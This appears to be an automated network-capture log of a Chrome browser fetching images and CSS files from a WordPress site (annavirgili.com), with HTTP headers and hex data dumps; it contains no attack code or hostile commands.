                                                                                                          Data Ascii: .tooltipster-sidetip.tooltipster-noir .tooltipster-box{border-radius:0;border:3px solid #000;background:#fff}.tooltipster-sidetip.tooltipster-noir .tooltipster-content{color:#000}.tooltipster-sidetip.tooltipster-noir .tooltipster-arrow{height:11px;margin-


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          60192.168.2.2449844147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:21 UTC437OUTGET /wp-content/uploads/2022/10/Home-3-1.jpg HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:21 UTC247INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:21 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Thu, 05 Oct 2023 20:28:06 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 42000
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: image/jpeg
                                                                                                          2024-12-12 11:58:21 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 01 4a 02 01 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 05 02 01 00 06 07 ff c4 00 19 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 8f 4d 92 61 b8 15 30 2f
                                                                                                          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222J"Ma0/
                                                                                                          2024-12-12 11:58:21 UTC16384INData Raw: 18 89 9d 19 9b 17 a6 c8 c9 fd 4e 85 15 ac 52 5c c5 99 cc 5b 14 bc 93 35 32 e9 1b 1e 38 a7 c3 33 b9 63 4c 98 e3 8a b5 1d 0d cc 9f 71 17 c3 68 dd a1 ca 11 73 45 e0 cb d4 cd 83 7e e5 e0 c5 0a 3a bf c9 48 97 36 ff 00 06 8c 96 1e 48 cd 22 b2 c3 d9 15 c8 e3 5e 85 24 a8 52 38 96 34 cd 33 32 1f e9 ff 00 25 f0 e6 5b 7f 26 b7 56 6e ca a9 3a 1e 4a 65 4c be 17 c1 a1 bc 9d 54 8f b5 7f 05 1c 9c 19 58 7e 37 d9 a2 8e 6a bd c7 09 53 3c 4b e1 af 63 95 9f b8 e7 91 4c cd 9b 88 dd 97 b9 b9 73 c7 0d ac 5f 0c e4 67 d4 9b dc b4 d9 a6 75 1d 79 fa f0 d8 70 de 3c 39 90 e5 82 b2 c7 b9 bc 58 e7 35 e1 7f 83 6f cd 5e e4 db ee 2f e9 91 4a a3 68 99 63 1c c7 24 d7 a3 34 e2 e3 44 cd 0f c4 5b c9 ff 00 c7 33 f5 3f 0f f0 6a c0 7f 06 a8 b4 73 d0 d1 8d 08 9f 72 32 36 1a d9 97 83 6c 72 96 e6 9e
                                                                                                          Data Ascii: NR\[5283cLqhsE~:H6H"^$R8432%[&Vn:JeLTX~7jS<KcLs_guyp<9X5o^/Jhc$4D[3?jsr26lr
                                                                                                          2024-12-12 11:58:21 UTC9232INData Raw: 02 9c 58 56 e1 28 e6 b8 e5 82 af 71 1c ca dc 5e 1f da 15 f7 1d 28 60 97 61 d5 c1 95 63 47 03 26 e8 8b 79 92 db 3d 6e a1 80 12 81 a3 08 2b 24 aa ee 13 b9 27 80 7d c1 90 bc a0 65 ab 03 0a 44 89 e8 aa c1 04 5b a9 68 74 88 70 b2 c0 2e 64 cd f8 39 20 b8 e7 01 6f dc b6 fe b4 29 7c 41 20 2b a6 4b fe 2f bf 89 7b 17 05 ca a7 a4 f8 94 f4 2a e5 34 14 98 ea 33 42 f9 07 8b fc 8e 62 ca cb 0b a3 a7 dc ad 02 f0 fe 73 bf 68 22 dc 8a f0 1e 25 3b 2b 70 cd 02 d6 12 48 1c 0b 2b 32 c2 b4 bf 43 89 8a 9d 46 8e d5 14 ca 17 fa 8f 5b f9 23 0c 15 e4 b9 4b 51 9b e1 22 70 04 c5 c1 cb e1 f8 f1 09 ca ed 0f fa d5 45 f6 0e e3 f8 87 15 01 58 6c a7 be 7d 91 59 83 63 a6 28 16 0e 2e d0 5f 19 ec f4 81 00 47 aa 27 bd a5 ba 89 11 3b 48 fc c0 74 b8 53 fe 25 3c dd 55 c0 e8 78 c6 fa 24 cf 97 b3 7f
                                                                                                          Data Ascii: XV(q^(`acG&y=n+$'}eD[htp.d9 o)|A +K/{*43Bbsh"%;+pH+2CF[#KQ"pEXl}Yc(._G';HtS%<Ux$


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          61192.168.2.2449846147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:21 UTC649OUTGET /wp-content/uploads/2022/03/LOGO-NEERO-X-SITO_Tavola-disegno-1-1.png HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:22 UTC247INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:22 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 29 Mar 2022 23:31:26 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 290743
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: image/png
                                                                                                          2024-12-12 11:58:22 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0c a4 00 00 05 6c 08 06 00 00 00 bc 2c a4 f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 84 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 05 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 4a 01 1b 00 05 00 00 00 01 00 00 00 52 01 28 00 03 00 00 00 01 00 02 00 00 87 69 00 04 00 00 00 01 00 00 00 5a 00 00 00 00 00 00 01 2c 00 00 00 01 00 00 01 2c 00 00 00 01 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 0c a4 a0 03 00 04 00 00 00 01 00 00 05 6c 00 00 00 00 21 ec ce 0d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 01 59 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c
                                                                                                          Data Ascii: PNGIHDRl,sRGBeXIfMM*JR(iZ,,l!pHYs.#.#x?vYiTXtXML:com.adobe.xmp<x:xmpmeta xml
                                                                                                          2024-12-12 11:58:22 UTC16384INData Raw: 20 40 80 00 01 02 04 08 10 20 40 e0 60 04 3e 54 67 7a fb 38 db f3 63 d9 01 0c 97 42 e8 7f bc 4f 60 43 cf 74 71 e1 fe fd fc 81 51 80 ef d2 2f 25 b9 b9 6d f1 ef 81 e1 77 8c 6a 33 6b cd 54 d7 25 01 4a e7 46 3b 1e 1e cb ee 33 e3 a9 c5 04 02 dd 47 ee 1f 75 4f d5 3f 26 38 75 55 ae 41 20 ef e9 0e 46 ec cf 98 dc 77 fa 33 e4 b8 2a 33 9b 53 d2 93 95 bf 79 b4 e6 81 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 7b 2a e0 cb f8 3d bd b0 4e 8b 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 07 22 70 63 9d e7 db 2a bf 56 79 91 81 c2 1d 38 f0 ab b5 7f 66 4c b9 54 ea 81 ed 8f d7 8b f9 a7 fb 04 1f f4 c0 e4 4b ed 6f db 7a 05 72 cd 72 1d 92 6e a8 9c eb 9d eb b1 c8 4c 05 b5 db 5a 52 f7 a3 cf cc 95 de fd 66 6e 93 d5 0d 0a f4 35 b9 77 d4 d9 7d 66
                                                                                                          Data Ascii: @ @`>Tgz8cBO`CtqQ/%mwj3kT%JF;3GuO?&8uUA Fw3*3Sy @ @{*=N @ @"pc*Vy8fLTKozrrnLZRfn5w}f
                                                                                                          2024-12-12 11:58:22 UTC16384INData Raw: f4 54 75 62 aa f3 63 97 0d d7 d1 f6 e1 71 78 bc 2a 18 1b bc d5 81 2c c3 59 b8 d6 d1 46 65 12 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 60 af 05 04 a4 ec f5 e1 d5 39 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 6c 85 c0 d3 d5 8a 1e 00 bc a8 51 3d 4b 44 06 a3 7c b4 28 f1 8e bd df 06 af 44 bb b3 9f a7 63 ed 7d 3b d6 95 bd 68 6e 0e 68 6f ff 9c fd 22 83 41 f2 b8 f4 0c 3d f1 74 e3 4b ff 76 f3 fc a0 e6 b1 83 ec 07 59 3c 5d 83 c0 93 55 a6 e3 b1 06 dc cb 28 f2 9a c8 7b 7f e5 1f 13 f4 98 49 fb 1a ef eb 2c 3f 0b 1c d7 42 b4 21 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 c0 58 81 fe 51 63 6c 7a e9 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 c0 32 02 39 38 b8 07 71 8f bd 27 dd 83 82 9f 8b bc
                                                                                                          Data Ascii: Tubcqx*,YFe @ @ @`9 @ @lQ=KD|(Dc};hnho"A=tKvY<]U({I,?B!@ @ @XQclz @ @ @298q'
                                                                                                          2024-12-12 11:58:22 UTC16384INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 6c 58 40 40 ca 86 c1 55 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 2d 12 e8 c1 bd b7 44 9b 6e ae 76 8d f9 e7 fa e1 c0 f6 e7 2a df 70 36 88 2d ea e2 89 6a 4a 0f 6c 7f 3f 7a fd f3 ea 79 0e ea b6 4c 27 d0 d7 d8 f5 d1 84 3b ab 19 63 ae b1 75 b7 38 03 c9 ba 6d bd 5d 77 9d ca 3f 5c a0 7f ab 7b ac de de a7 6b 76 18 f0 d4 33 c0 64 50 56 f7 f9 70 91 d9 de 9e 4d 28 03 ec fe 7b 5e 42 ef 11 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 c0 74 02 63 6e f8 4e d7 3a 35 13 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 c0 ba 04 86 03 85 1f aa 4a 3e 8d ed 98 19 52 72 a0 70 a6 fb 53 ac ef c4 9a cb b0 bc d9 1e 8f 53 08 e4 7d ff 0c 30 e8 99 6b 3a 48 65 8a b6
                                                                                                          Data Ascii: @ @lX@@UG @ @-Dnv*p6-jJl?zyL';cu8m]w?\{kv3dPVpM({^B @ @ @tcnN:5 @ @ @J>RrpSS}0k:He
                                                                                                          2024-12-12 11:58:22 UTC16384INData Raw: f9 c2 c1 23 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 f6 42 40 40 ca 5e 5c 66 27 49 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 c0 96 0a 64 f0 70 0f ee bd ba 96 df 5b 39 33 5e 4c 19 28 9c ed 32 0b 46 d2 3d 8b e2 60 30 72 1f 6f ac 3a b4 e8 3a 32 40 f9 f7 8f ad f2 9d b2 41 e6 87 92 6d f4 0b 19 64 9e 6b ff 96 ca 7f 62 b4 74 6a 5f c8 e6 bd 6d cf 82 e0 f7 85 81 38 63 d1 d7 e4 96 d1 86 04 1d cd 75 5d d2 96 0e 54 bb 7b b4 27 f7 af dc 87 a4 f9 05 7e 6d 34 a1 fb cc 72 8b 96 ef e9 9f 1c 2f 24 c0 e8 6c c1 2b cb fb 65 b9 67 c6 c9 ec 2b 3f 19 2f 9e ad 8e f1 92 82 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 76 4d 60 ae 1f 26 76 cd d1 f9 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 e0 b4 04 7a 70
                                                                                                          Data Ascii: # @ @B@@^\f'I @ @dp[93^L(2F=`0ro::2@Amdkbtj_m8cu]T{'~m4r/$l+eg+?/ @ @vM`&v @ @ @zp
                                                                                                          2024-12-12 11:58:22 UTC16384INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                          2024-12-12 11:58:22 UTC16384INData Raw: f0 a3 95 df 51 99 8b 49 29 5f 62 bb 05 72 5c 90 93 9f 7f 5d 79 43 e5 4f 56 a6 7e c8 c5 c3 d4 11 62 35 81 1c 3f fd 8b ca 9f af 4c a3 5a 37 a6 57 af 20 30 5a 60 78 dc fd 3d 35 56 8e 85 6e ae ec 0b 32 a3 27 64 c0 53 15 c8 3e 30 75 e9 85 95 2f ac 7c 56 65 22 ef 3b d6 3a a2 f0 67 8b 04 52 2e 73 4c 90 f2 fa 8c c9 7c e5 c2 cd 71 d1 e3 64 b8 a7 55 fe 6c 65 6e 36 ea 36 84 ea 15 04 08 ec b8 40 7e dd 3a 91 fd 59 b6 79 71 18 02 39 1f cc 71 66 f6 0b 39 c7 17 bb 23 90 9b 7f 13 59 6f 39 de b4 dd 46 63 f3 11 e7 dc 88 9d 73 fe fc fa ea b2 d7 4c b2 ce fa 3c e1 93 d5 9f c8 74 b3 4d e6 9c 50 10 48 d9 ca 35 91 1c 73 af 33 72 13 6f e2 63 95 7d 63 ef d1 1b fe 1c a4 40 ea b4 de 7f 0c fb 67 d5 43 f9 3c ed c7 7d e3 c4 dd 47 8a 65 3f d5 0f ad a4 3c f7 c3 29 b7 56 ff 2d 93 4c ff bb
                                                                                                          Data Ascii: QI)_br\]yCOV~b5?LZ7W 0Z`x=5Vn2'dS>0u/|Ve";:gR.sL|qdUlen66@~:Yyq9qf9#Yo9FcsL<tMPH5s3roc}c@gC<}Ge?<)V-L
                                                                                                          2024-12-12 11:58:23 UTC16384INData Raw: 91 ea e4 b7 72 e2 8f 0c d1 c6 d2 4e 5d af 63 cb 33 cc 42 9b 02 44 92 66 10 f0 24 ca c1 92 08 3b ea f1 c1 34 36 75 e5 6f ad 07 67 96 5a d7 be 56 33 40 44 90 20 b0 40 04 6a 9f e3 64 c9 81 0e 11 34 b4 ee ac d4 a9 79 9c d7 f7 de 4b b2 40 09 02 8e 71 c8 31 08 04 81 cd 23 60 df 77 07 fd e4 db 62 ec 57 1d 87 98 87 3d 9b d5 3d ec 33 9d a3 3a 79 cc 9a 58 8a c0 08 f5 02 81 ba ad fe b5 24 46 4f bc 18 66 56 3a 43 b9 ff a7 dc 8b bc 17 dd e0 07 79 4c a2 6c 68 46 08 f0 cc 8d f3 f1 ca f3 0c 88 59 74 1d 5f 9b 57 fb 61 e1 19 14 ff 74 8c 43 4b 47 da 9a 6d 8c ff 21 b9 1e 5b cc b2 8d 4c 5b 76 36 a4 4c d6 92 56 da ef 7b eb e7 f8 45 3c 07 fc 3d db 97 be 3c ff f5 da 0f 75 b0 0f cb a6 94 bb 8b a1 2c e2 1b e3 90 e3 fc 11 a8 fb bf 67 ea f6 6e bf 8b 8e 25 59 8e 3a 45 26 9f b3 a1 f4
                                                                                                          Data Ascii: rN]c3BDf$;46uogZV3@D @jd4yK@q1#`wbW==3:yX$FOfV:CyLlhFYt_WatCKGm![L[v6LV{E<=<u,gn%Y:E&
                                                                                                          2024-12-12 11:58:23 UTC16384INData Raw: 20 08 04 81 20 b0 31 02 ad 0f 1e 37 ae 41 be d1 15 02 0c 2e bc c0 e4 f1 ca 6f 2f ae 27 41 a7 b9 8f 07 2e ff a2 42 be 26 e6 5f 02 58 74 ee cd 29 4c b4 6e 76 10 a4 af 2e 8c d0 17 e4 86 9e 20 26 90 41 d0 8c 34 14 04 82 c0 f4 08 f0 26 7b ec c1 f7 c4 47 97 e2 58 44 ec b7 6b 96 4b bd 4f 6c 33 9e ad 9a 3c 49 4c 60 88 37 f9 87 82 40 10 08 02 b3 44 c0 0b 65 2f d5 4d 1e 23 c6 cf f3 26 39 7c b5 21 4c ce e0 ab d9 ef 3c 54 f9 e7 89 21 fa 11 db de d1 85 1c 82 40 10 08 02 41 60 22 04 e8 2f b0 a5 f7 10 df af fc 92 b1 b0 6d 6e b9 34 71 c2 82 01 fc fd f3 c4 1f a8 7e cd e6 14 36 a8 f7 89 c0 08 62 e3 e7 ed 46 b9 61 f4 ad a5 2a 49 82 40 10 98 23 02 5e a0 f7 63 dd f3 b4 72 df 3e f9 ea f8 dd 8e 31 3f 4e 79 de aa 4a 3c 35 9b c4 05 42 68 6a 04 ac 1f 6e 5b 14 d8 c5 1c 17 e3 65 cf
                                                                                                          Data Ascii: 17A.o/'A.B&_Xt)Lnv. &A4&{GXDkKOl3<IL`7@De/M#&9|!L<T!@A`"/mn4q~6bFa*I@#^cr>1?NyJ<5Bhjn[e
                                                                                                          2024-12-12 11:58:23 UTC16384INData Raw: fc 69 1f ef 5d d7 69 3d 7e c0 bd 73 49 95 c5 f1 91 da cd 26 04 42 20 04 42 20 04 42 20 04 42 20 04 42 20 04 42 60 c8 04 3c 39 6a c8 36 c6 b6 1d 13 20 48 85 1c 28 65 02 31 e2 20 d6 74 6f 73 af 4c 0e 44 2e 92 be 6f 92 fa e5 44 ba da 1d cc c6 f7 30 ff 90 e2 a7 65 78 20 6a 30 46 6e c7 10 ec f6 e0 2f 83 a9 b7 ac fd 0c a8 6e 07 56 0e 85 c0 0a 09 e0 53 3d 48 fe 02 a5 cf 94 f2 3b e5 e9 55 63 10 97 ed 9a 2a 0c 8b 52 ae 2f 3d 57 7a 5d 29 41 5f 3f c1 52 c9 48 08 84 40 08 f4 4e 80 c1 56 fb d9 17 29 fd d2 ba 02 be 69 4c 83 4d 0c 02 ba 7d fa 4a a5 6f 2b a5 1e c9 a2 14 41 88 84 40 08 2c 84 00 7e 94 7e 3d ed d6 63 ea 0a 7d 4c 48 c0 6f db 77 9d 5a f9 0e 75 43 f9 69 cb 7e 4d fa 26 29 c2 22 9d 16 26 fa 10 eb a1 7e bc 87 94 85 8c 08 76 f3 bd 46 42 20 04 42 60 b3 04 58 9c 77
                                                                                                          Data Ascii: i]i=~sI&B B B B B B`<9j6 H(e1 tosLD.oD0ex j0Fn/nVS=H;Uc*R/=Wz])A_?RH@NV)iLM}Jo+A@,~~=c}LHowZuCi~M&)"&~vFB B`Xw


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          62192.168.2.2449848147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:22 UTC659OUTGET /wp-content/uploads/elementor/css/post-8052462574847.css?ver=1725434764 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:23 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:22 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 04 Sep 2024 07:26:04 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 2464
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:23 UTC2464INData Raw: 2e 65 6c 65 6d 65 6e 74 6f 72 2d 38 30 35 32 34 36 32 35 37 34 38 34 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 37 62 34 34 63 62 34 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 39 30 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 38 30 35 32 34 36 32 35 37 34 38 34 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 37 62 34 34 63 62 34 3a 6e 6f 74 28 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6d 6f 74 69 6f 6e 2d 65 66 66 65 63 74 73 2d 65 6c 65 6d 65 6e 74 2d 74 79 70 65 2d 62 61 63 6b 67 72 6f 75 6e 64 29 2c 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 38 30 35 32 34 36 32 35
                                                                                                          Data Ascii: .elementor-8052462574847 .elementor-element.elementor-element-7b44cb4 > .elementor-container{max-width:900px;}.elementor-8052462574847 .elementor-element.elementor-element-7b44cb4:not(.elementor-motion-effects-element-type-background), .elementor-80524625


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          63192.168.2.2449847147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:22 UTC661OUTGET /wp-content/plugins/fami-templatekits/assets/css/fmtpl-menu.css?ver=1.0.4 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:23 UTC266INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:23 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 10 Aug 2021 13:55:31 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 145
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:23 UTC145INData Raw: 2e 66 6d 74 70 6c 2d 6d 65 6e 75 20 2e 6e 61 76 5f 6d 65 6e 75 5f 63 6f 6e 74 65 6e 74 2e 68 61 73 5f 69 74 65 6d 5f 64 69 76 69 64 65 72 20 2e 6d 65 6e 75 2d 69 74 65 6d 3a 61 66 74 65 72 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 0a 2f 2a 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 66 6d 74 70 6c 2d 6d 65 6e 75 2e 63 73 73 2e 6d 61 70 20 2a 2f 0a
                                                                                                          Data Ascii: .fmtpl-menu .nav_menu_content.has_item_divider .menu-item:after { content: ""; display: block;}/*# sourceMappingURL=fmtpl-menu.css.map */


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          64192.168.2.2449849147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:22 UTC668OUTGET /wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:23 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:23 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 25 Mar 2022 21:30:22 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 18468
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
